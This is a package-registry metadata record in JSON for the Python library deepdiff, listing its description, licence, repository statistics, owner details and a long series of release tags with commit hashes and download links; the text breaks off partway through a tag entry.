{"id":2629476,"name":"deepdiff","ecosystem":"pypi","description":"Deep Difference and Search of any Python object/data. Recreate objects by adding deltas to each other.","homepage":"https://zepworks.com/deepdiff/","licenses":"MIT License","normalized_licenses":["MIT"],"repository_url":"https://github.com/qlustered/deepdiff","keywords_array":[],"namespace":null,"versions_count":90,"first_release_published_at":"2014-09-27T20:16:59.000Z","latest_release_published_at":"2026-03-30T05:52:22.000Z","latest_release_number":"9.0.0","last_synced_at":"2026-04-18T04:10:41.062Z","created_at":"2022-04-10T07:01:06.699Z","updated_at":"2026-04-18T04:10:41.063Z","registry_url":"https://pypi.org/project/deepdiff/","install_command":"pip install deepdiff --index-url https://pypi.org/simple","documentation_url":"https://zepworks.com/deepdiff/","metadata":{"funding":null,"documentation":"https://zepworks.com/deepdiff/","classifiers":["Development Status :: 5 - Production/Stable","Intended Audience :: Developers","License :: OSI Approved :: MIT License","Operating System :: OS Independent","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Programming Language :: Python :: Implementation :: PyPy","Topic :: Software Development"],"normalized_name":"deepdiff","project_status":null},"repo_metadata":{"id":21179691,"uuid":"24484622","full_name":"seperman/deepdiff","owner":"seperman","description":"DeepDiff: Deep Difference and search of any Python object/data. DeepHash: Hash of any object based on its contents. 
Delta: Use deltas to reconstruct objects by adding deltas together.","archived":false,"fork":false,"pushed_at":"2024-08-28T20:23:33.000Z","size":2279,"stargazers_count":1978,"open_issues_count":70,"forks_count":217,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-09-07T01:51:07.955Z","etag":null,"topics":["comparison","deep-search","deepdiff","deephash","delta","diff","difference","distance","distance-calculation","hash","hashing","nested","python","reconstruction","recursive","repetition","report-repetition","tree"],"latest_commit_sha":null,"homepage":"http://zepworks.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/seperman.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":"docs/support.rst","governance":null,"roadmap":null,"authors":"AUTHORS.md","dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["seperman"],"ko_fi":"seperman"}},"created_at":"2014-09-26T03:21:47.000Z","updated_at":"2024-09-06T07:03:43.000Z","dependencies_parsed_at":"2024-02-05T01:28:05.533Z","dependency_job_id":"5530b552-6c13-41ac-a6a8-730c7ae5c01a","html_url":"https://github.com/seperman/deepdiff","commit_stats":{"total_commits":815,"total_committers":73,"mean_commits":"11.164383561643836","dds":"0.26625766871165646","last_synced_commit":"e633e37fe6210638ba9575d84043fbb23e12ffc2"},"previous_names":[],"tags_count":50,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags","releases_url":"https://re
pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seperman","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217914542,"owners_count":16250267,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"seperman","name":"Sep Dehpour","uuid":"2314797","kind":"user","description":"A long time ago, my dad bought a CASIO calculator that I could program. I wrote my first ASCII game in it. 
I have not stopped coding since then.","email":"","website":"https://zepworks.com","location":"Los Angeles","twitter":null,"company":"@zepworks @qlustered ","icon_url":"https://avatars.githubusercontent.com/u/2314797?v=4","repositories_count":19,"last_synced_at":"2024-05-20T15:10:45.784Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/seperman","funding_links":["https://github.com/sponsors/seperman"],"total_stars":2317,"followers":119,"following":32,"created_at":"2022-11-02T16:28:11.952Z","updated_at":"2024-05-20T15:10:47.693Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seperman","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/seperman/repositories"},"tags":[{"name":"7.0.1","sha":"be22027e86ccb531164404fce7fc43a6633ac135","kind":"commit","published_at":"2024-04-08T22:57:11.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/7.0.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/7.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/7.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/7.0.1/manifests"},{"name":"6.7.1","sha":"89c5cc227c48b63be4a0e1ad4af59d3c1b0272d7","kind":"commit","published_at":"2023-11-14T07:16:07.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.7.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.7.1/manifests"},{"name":"6.6.0","sha":"17f34a7fe2dad13911dd7d3a54eb1cf95a183cc4","kind":"commit","published_at":"2023-10-04T22:43:49.000Z","download_url":"https://codeload.github.com/seper
man/deepdiff/tar.gz/6.6.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.6.0/manifests"},{"name":"6.4.1","sha":"888ca776a21cecb243ccf283ce29347bb4897c34","kind":"commit","published_at":"2023-09-01T16:44:00.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.4.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.1/manifests"},{"name":"6.4.0","sha":"01260075e4f043116bf3d8c87c56458b89ee4707","kind":"commit","published_at":"2023-09-01T00:25:28.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.4.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.4.0/manifests"},{"name":"6.3.1","sha":"cb31948b5c8ed295c9720fbf3cf2b9f8073acd14","kind":"tag","published_at":"2023-07-06T14:27:45.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.3.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.1/manifests"}
,{"name":"6.3.0","sha":"d2b5ec6487b6720faaa4f778309611e30b554387","kind":"commit","published_at":"2023-03-17T18:27:19.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.3.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.3.0/manifests"},{"name":"6.2.3","sha":"1353b723f8faa3271d7572f0a54c5074547e257d","kind":"tag","published_at":"2023-01-06T05:00:31.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.2.3","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.3/manifests"},{"name":"6.2.2","sha":"277ed776d9fcffbe21ac2052e5097268cbb589b7","kind":"tag","published_at":"2022-12-11T22:15:40.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.2.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.2/manifests"},{"name":"6.2.1","sha":"093949f7be4f3e6fecf38a35b3a535955a8c6beb","kind":"commit","published_at":"2022-10-18T00:56:15.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.2.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/
GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.2.1/manifests"},{"name":"6.1.0","sha":"e916b5f6c607a722f3ace9d84189688a808ab37b","kind":"commit","published_at":"2022-08-28T02:48:24.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.1.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.1.0/manifests"},{"name":"6.0.0","sha":"ca8e58ee0a4fb9c855ef6c925d3c86227c538d4b","kind":"commit","published_at":"2022-08-14T01:49:40.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/6.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/6.0.0/manifests"},{"name":"v5.8.2","sha":"81341e2827d083429bcdfb4617cd40e1188bbdb7","kind":"commit","published_at":"2022-05-17T06:26:05.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v5.8.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v5.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.2/manifests"},{"name":"v5.8.1","sha":"9b70b2b5f17e345cb00aef74db7169b53f0c22e8","kind":"commit","published_at":"2022-05-13T06:41:53.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz
/v5.8.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v5.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v5.8.1/manifests"},{"name":"5.8.0","sha":"9c4dade2deae01307f4fd4ecf8a917d7fdbc5375","kind":"tag","published_at":"2022-04-10T06:23:13.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.8.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.8.0/manifests"},{"name":"5.7.0","sha":"f2ffdb83b2993f4f0bb7e854620f0acd0bf6339e","kind":"tag","published_at":"2021-12-17T19:12:40.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.7.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.7.0/manifests"},{"name":"5.6.0","sha":"06faa820bb83b1eac2e466b44e30dc86307895cc","kind":"commit","published_at":"2021-10-13T06:31:56.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.6.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.6.0/manifests"},{"name":"5.5.0","
sha":"bc1ab6ae1332de93039e65ac280045674987fc5d","kind":"commit","published_at":"2021-04-29T06:20:59.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.5.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.5.0/manifests"},{"name":"5.3.0","sha":"2b04c553d3ed9f27a99ffe965450c2e7c2336da6","kind":"commit","published_at":"2021-04-16T23:16:30.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.3.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.3.0/manifests"},{"name":"5.2.3","sha":"5b66b96f1fa63f8ecc3b267e4a65c552df7d0190","kind":"commit","published_at":"2021-02-16T20:18:34.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.2.3","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.3/manifests"},{"name":"5.2.2","sha":"c6fa94ff7987eed0254e7bb124831cfda3b00fa7","kind":"commit","published_at":"2021-01-15T03:16:54.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.2.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos
itories/seperman%2Fdeepdiff/tags/5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.2/manifests"},{"name":"5.2.1","sha":"2451bf36f88b33c834cac493697dc6f1296c65af","kind":"commit","published_at":"2021-01-01T07:41:51.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.2.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.2.1/manifests"},{"name":"5.0.2","sha":"df5f49046b3c39673003968fc484a6a733b24abc","kind":"commit","published_at":"2020-07-23T17:46:48.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.0.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.2/manifests"},{"name":"5.0.0","sha":"15a99abefd93de22367f1bb9fec228b4dd0675f6","kind":"commit","published_at":"2020-06-23T04:19:56.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/5.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/5.0.0/manifests"},{"name":"4.3.2","sha":"af1a0d4b4d5ea91e65d306e28ed4297718b77a9a","kind":"commit","published_at":"2020-03-19T01:55:43.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.3.2","html_url"
:"https://github.com/seperman/deepdiff/releases/tag/4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.2/manifests"},{"name":"4.3.1","sha":"3b3a067c43f775549a01f76a0e62b96233b5e7f4","kind":"commit","published_at":"2020-03-11T21:44:21.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.3.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.3.1/manifests"},{"name":"4.2.0","sha":"9b09935cd46b784529667135463c4f4a29a60bd3","kind":"commit","published_at":"2020-01-30T21:32:11.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.2.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.2.0/manifests"},{"name":"4.0.7","sha":"269fa49e86d9c160d925376ce1239d7504a8f330","kind":"commit","published_at":"2019-07-12T23:05:12.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.7","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.7/manifests"},{"name":"4.0.6","sha":"a66879190f
adc671632f154c1fcb82f5c3cef800","kind":"commit","published_at":"2019-04-13T01:06:22.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.6","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.6/manifests"},{"name":"4.0.5","sha":"fa3b37399ef53d9cc75f81ca6a8e7e4f3c1a516b","kind":"commit","published_at":"2019-04-07T07:46:58.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.5","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.5/manifests"},{"name":"4.0.4","sha":"b6afc83cd47296b0a1d68437a7b1fdd1a689659c","kind":"commit","published_at":"2019-04-05T06:55:41.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.4","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.4/manifests"},{"name":"4.0.0","sha":"885a5d5fb16622a4fce1e79bb273dd8d44a6704f","kind":"commit","published_at":"2019-03-19T10:18:57.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/4.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman
%2Fdeepdiff/tags/4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/4.0.0/manifests"},{"name":"v3.3.0","sha":"103a20192aa1c900863db327bd522c04418de94a","kind":"tag","published_at":"2017-06-30T21:47:42.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.3.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"d4918e17c555df1b46827f865c5c105097199f80","kind":"tag","published_at":"2017-05-29T05:49:30.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.2.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"257c3b46f4cc4c7f1769e85f98e96a7c18307b0e","kind":"tag","published_at":"2017-04-12T18:00:16.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.2.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"2e2f1621d2a6d28d7449431fa60b507046420127","kind":"tag","published_at":"2017-03-10T01:45:56.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.1.2","html_url":"https://g
ithub.com/seperman/deepdiff/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"49ec7cfce26e240ec9ac09d75bfbe3f680773bf7","kind":"tag","published_at":"2017-03-04T21:49:15.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.1.1","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.1.1/manifests"},{"name":"v3.0.0","sha":"4c67c0491c95c7b86ab109a75110112dea789303","kind":"tag","published_at":"2017-01-27T18:13:02.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v3.0.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v3.0.0/manifests"},{"name":"v2.5.3","sha":"ec30c3d58400fdc3116992477aa3983acc9614bb","kind":"tag","published_at":"2016-12-05T20:03:35.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.5.3","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.3/manifests"},{"name":"v2.5.2","sha":"2a5ee8da0b0
8e0e37bb6a764507c0382e25b4c97","kind":"tag","published_at":"2016-12-05T03:45:03.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.5.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.2/manifests"},{"name":"v2.5.0","sha":"da3333f27043fb6906358b7b7136e8d09a5f8d9c","kind":"tag","published_at":"2016-08-18T01:42:15.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.5.0","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.5.0/manifests"},{"name":"v2.1.2","sha":"877234a77465617d5118f1638aff28400ee90fd8","kind":"tag","published_at":"2016-08-09T23:11:28.000Z","download_url":"https://codeload.github.com/seperman/deepdiff/tar.gz/v2.1.2","html_url":"https://github.com/seperman/deepdiff/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/seperman%2Fdeepdiff/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"086f0fe9d69c861f5a01975360ece0b5e3aa76c0","kind":"tag","published_at":"2016-08-08T18:13:42.000Z","download_url":